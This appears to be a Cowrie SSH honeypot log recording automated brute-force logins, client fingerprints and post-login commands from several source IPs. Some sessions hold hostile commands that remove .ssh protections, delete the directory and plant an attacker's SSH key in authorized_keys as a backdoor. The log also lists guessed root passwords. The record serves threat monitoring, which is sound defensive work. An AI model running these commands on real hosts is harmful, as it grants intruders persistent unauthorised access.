{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:58.760042Z","src_ip":"45.159.112.103","session":"abe7914b9fda"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37380,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f060093f287","protocol":"ssh","message":"New connection: 45.159.112.103:37380 (1.2.3.4:22) [session: 5f060093f287]","sensor":"my-vps","timestamp":"2025-08-26T00:23:58.879227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:23:58.880112Z","src_ip":"45.159.112.103","session":"5f060093f287"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:23:58.994562Z","src_ip":"45.159.112.103","session":"5f060093f287"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:23:59.491601Z","src_ip":"45.159.112.103","session":"5f060093f287"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:59.606419Z","src_ip":"45.159.112.103","session":"b853a7f4fea1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:59.607516Z","src_ip":"45.159.112.103","session":"5f060093f287"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48522,"dst_ip":"1.2.3.4","dst_port":22,"session":"5418c7f6f1e9","protocol":"ssh","message":"New connection: 27.112.78.245:48522 (1.2.3.4:22) [session: 5418c7f6f1e9]","sensor":"my-vps","timestamp":"2025-08-26T00:24:07.381938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:24:07.382986Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:24:07.644500Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.login.success","username":"root","password":"pass_123","message":"login attempt [root/pass_123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:24:08.769751Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:24:09.341381Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:24:09.342088Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:24:09.343368Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:09.604907Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:24:10.142617Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:24:10.143324Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:24:10.535433Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:10.536247Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48530,"dst_ip":"1.2.3.4","dst_port":22,"session":"09e7274f4872","protocol":"ssh","message":"New connection: 27.112.78.245:48530 (1.2.3.4:22) [session: 09e7274f4872]","sensor":"my-vps","timestamp":"2025-08-26T00:24:10.792780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:24:10.793715Z","src_ip":"27.112.78.245","session":"09e7274f4872"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:24:11.056810Z","src_ip":"27.112.78.245","session":"09e7274f4872"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:24:12.143203Z","src_ip":"27.112.78.245","session":"09e7274f4872"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:13.432765Z","src_ip":"27.112.78.245","session":"09e7274f4872"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":48536,"dst_ip":"1.2.3.4","dst_port":22,"session":"24c3e4952e83","protocol":"ssh","message":"New connection: 27.112.78.245:48536 (1.2.3.4:22) [session: 24c3e4952e83]","sensor":"my-vps","timestamp":"2025-08-26T00:24:13.674702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:24:13.675652Z","src_ip":"27.112.78.245","session":"24c3e4952e83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:24:13.943844Z","src_ip":"27.112.78.245","session":"24c3e4952e83"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:24:15.062027Z","src_ip":"27.112.78.245","session":"24c3e4952e83"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:15.332141Z","src_ip":"27.112.78.245","session":"24c3e4952e83"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:15.333032Z","src_ip":"27.112.78.245","session":"5418c7f6f1e9"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":33166,"dst_ip":"1.2.3.4","dst_port":22,"session":"2406ec8538a4","protocol":"ssh","message":"New connection: 24.108.102.132:33166 (1.2.3.4:22) [session: 2406ec8538a4]","sensor":"my-vps","timestamp":"2025-08-26T00:24:20.509966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:24:20.515372Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:24:20.677824Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.login.success","username":"root","password":"Root#123","message":"login attempt [root/Root#123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:24:21.338536Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:24:21.722044Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:24:21.722837Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:24:21.724263Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:21.892912Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:24:22.275744Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:24:22.276555Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:24:22.440869Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:22.441710Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":33176,"dst_ip":"1.2.3.4","dst_port":22,"session":"3747df1332e3","protocol":"ssh","message":"New connection: 24.108.102.132:33176 (1.2.3.4:22) [session: 3747df1332e3]","sensor":"my-vps","timestamp":"2025-08-26T00:24:22.591287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:24:22.602040Z","src_ip":"24.108.102.132","session":"3747df1332e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:24:22.764353Z","src_ip":"24.108.102.132","session":"3747df1332e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:24:23.434874Z","src_ip":"24.108.102.132","session":"3747df1332e3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:24.605027Z","src_ip":"24.108.102.132","session":"3747df1332e3"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":33190,"dst_ip":"1.2.3.4","dst_port":22,"session":"f317076555e9","protocol":"ssh","message":"New connection: 24.108.102.132:33190 (1.2.3.4:22) [session: f317076555e9]","sensor":"my-vps","timestamp":"2025-08-26T00:24:24.755718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:24:24.766441Z","src_ip":"24.108.102.132","session":"f317076555e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:24:24.934272Z","src_ip":"24.108.102.132","session":"f317076555e9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:24:25.594118Z","src_ip":"24.108.102.132","session":"f317076555e9"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:25.756418Z","src_ip":"24.108.102.132","session":"2406ec8538a4"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:24:25.761825Z","src_ip":"24.108.102.132","session":"f317076555e9"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":59374,"dst_ip":"1.2.3.4","dst_port":22,"session":"adaaefcf7739","protocol":"ssh","message":"New connection: 45.159.112.103:59374 (1.2.3.4:22) [session: adaaefcf7739]","sensor":"my-vps","timestamp":"2025-08-26T00:25:05.007833Z"}
